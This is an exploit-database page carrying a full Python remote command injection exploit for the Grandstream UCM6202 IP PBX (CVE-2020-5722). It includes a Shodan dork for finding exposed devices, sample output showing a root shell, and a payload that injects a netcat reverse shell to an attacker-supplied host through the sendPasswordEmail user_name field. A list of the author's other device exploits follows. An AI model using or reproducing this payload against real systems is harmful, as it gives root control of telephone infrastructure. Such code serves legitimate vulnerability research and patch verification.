Search for hundreds of thousands of exploits

"UCM6202 1.0.18.13 - Remote Command Injection"

Author

Exploit author

"Jacob Baines"

Platform

Exploit platform

hardware

Release date

Exploit published date

2020-03-24

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
# Exploit Title: UCM6202 1.0.18.13 - Remote Command Injection
# Date: 2020-03-23
# Exploit Author: Jacob Baines
# Vendor: http://www.grandstream.com
# Product Link: http://www.grandstream.com/products/ip-pbxs/ucm-series-ip-pbxs/product/ucm6200-series
# Tested on: UCM6202 1.0.18.13
# CVE : CVE-2020-5722
# Shodan Dork: ssl:"Grandstream" "Set-Cookie: TRACKID"
# Advisory: https://www.tenable.com/security/research/tra-2020-15
#
# Sample output:
# albinolobster@ubuntu:~$ python3 pbx_sploit.py --rhost 192.168.2.1 --lhost 192.168.2.107
# [+] Sending getInfo request to  https://192.168.2.1:8089/cgi
# [+] Remote target info:
# -> Model:  UCM6202
# -> Version:  1.0.18.13
# [+] Vulnerable version!
# [+] Sending exploit. Reverse shell to 192.168.2.107:1270
#
# albinolobster@ubuntu:~$ nc -lvp 1270
# Listening on [] (family 2, port)
# Connection from _gateway 41675 received!
# whoami
# root
# uname -a
# Linux UCM6202 3.0.35 #1 SMP PREEMPT Thu Jul 5 15:56:51 CST 2018 armv7l GNU/Linux
##

import os
import re
import sys
import json
import argparse
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

top_parser = argparse.ArgumentParser(description='')
top_parser.add_argument('--rhost', action="store", dest="rhost",
required=True, help="The remote host to connect to")
top_parser.add_argument('--rport', action="store", dest="rport", type=int,
help="The remote port to connect to", default=8089)
top_parser.add_argument('--lhost', action="store", dest="lhost",
required=True, help="The local host to connect back to")
top_parser.add_argument('--lport', action="store", dest="lport", type=int,
help="The local port to connect back to", default=1270)
args = top_parser.parse_args()


url = 'https://' + args.rhost + ':' + str(args.rport) + '/cgi'
print('[+] Sending getInfo request to ', url)

try:
    resp = requests.post(url=url, data='action=getInfo', verify=False)
except Exception:
    print('[-] Error connecting to remote target')
    sys.exit(1)

if resp.status_code != 200:
    print('[-] Did not get a 200 OK on getInfo request')
    sys.exit(1)

if resp.text.find('{ "response":') != 0:
    print('[-] Unexpected response')
    sys.exit(1)

try:
    parsed_response = json.loads(resp.text)
except Exception:
    print('[-] Unable to parse json response')
    sys.exit(1)

print('[+] Remote target info: ')
print('\t-> Model: ', parsed_response['response']['model_name'])
print('\t-> Version: ', parsed_response['response']['prog_version'])

match = re.match('^([0-9]+)\.([0-9]+)\.([0-9]+)\.([0-9]+)$',
parsed_response['response']['prog_version'])
if not match:
    print('[-] Failed to extract the remote targets version')
    sys.exit(1)

major = int(match[1])
minor = int(match[2])
point = int(match[3])
patch = int(match[4])

if (major > 1) or (major == 1 and minor > 0) or (major == 1 and minor == 0
and point > 19) or (major == 1 and minor == 0 and point == 19 and patch >=
20):
    print('[-] Unaffected version')
    sys.exit(1)
else:
    print('[+] Vulnerable version!')

print('[+] Sending exploit. Reverse shell to %s:%i' % (args.lhost,
args.lport))
try:
    exploit = 'admin\' or 1=1--`;`nc${IFS}' + args.lhost + '${IFS}' +
str(args.lport) + '${IFS}-e${IFS}/bin/sh`;`'
    resp = requests.post(url=url,
data='action=sendPasswordEmail&user_name=' + exploit, verify=False)
except Exception as err:
    print('[-] Failed to send payload')
    sys.exit(1)

if resp.status_code != 200:
    print('[-] Did not get a 200 OK on sendPasswordEmail request')
    sys.exit(1)

try:
    parsed_response = json.loads(resp.text)
except Exception:
    print('[-] Unable to parse json response')
    sys.exit(1)

if parsed_response['status'] == 0:
    print('[+] Success! Clean exit.')
else:
    print('[-] Something bad happened.')
Release DateTitleTypePlatformAuthor
2020-04-17"Cisco IP Phone 11.7 - Denial of service (PoC)"webappshardware"Jacob Baines"
2020-04-08"Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)"webappshardware"Jacob Baines"
2020-03-31"Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection"webappshardware"Jacob Baines"
2020-03-31"Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection"webappshardware"Jacob Baines"
2020-03-24"UCM6202 1.0.18.13 - Remote Command Injection"webappshardware"Jacob Baines"
2019-10-31"MikroTik RouterOS 6.45.6 - DNS Cache Poisoning"remotehardware"Jacob Baines"
2019-07-30"Amcrest Cameras 2.520.AC00.18.R - Unauthenticated Audio Streaming"webappshardware"Jacob Baines"
2019-05-03"Crestron AM/Barco wePresent WiPG/Extron ShareLink/Teq AV IT/SHARP PN-L703WA/Optoma WPS-Pro/Blackbox HD WPS/InFocus LiteShow - Remote Command Injection"webappshardware"Jacob Baines"
2019-02-21"MikroTik RouterOS < 6.43.12 (stable) / < 6.42.12 (long-term) - Firewall and NAT Bypass"remotehardware"Jacob Baines"
2019-02-11"Indusoft Web Studio 8.1 SP2 - Remote Code Execution"remotemultiple"Jacob Baines"
2018-12-21"Netatalk < 3.1.12 - Authentication Bypass"remotemultiple"Jacob Baines"
2018-10-10"MicroTik RouterOS < 6.43rc3 - Remote Root"remotehardware"Jacob Baines"
2018-09-18"NUUO NVRMini2 3.8 - 'cgi_system' Buffer Overflow (Enable Telnet)"remotehardware"Jacob Baines"
2017-06-14"HP PageWide Printers / HP OfficeJet Pro Printers (OfficeJet Pro 8210) - Arbitrary Code Execution"remotehardware"Jacob Baines"
2016-10-20"MiCasaVerde VeraLite - Remote Code Execution"remotehardware"Jacob Baines"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48247/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.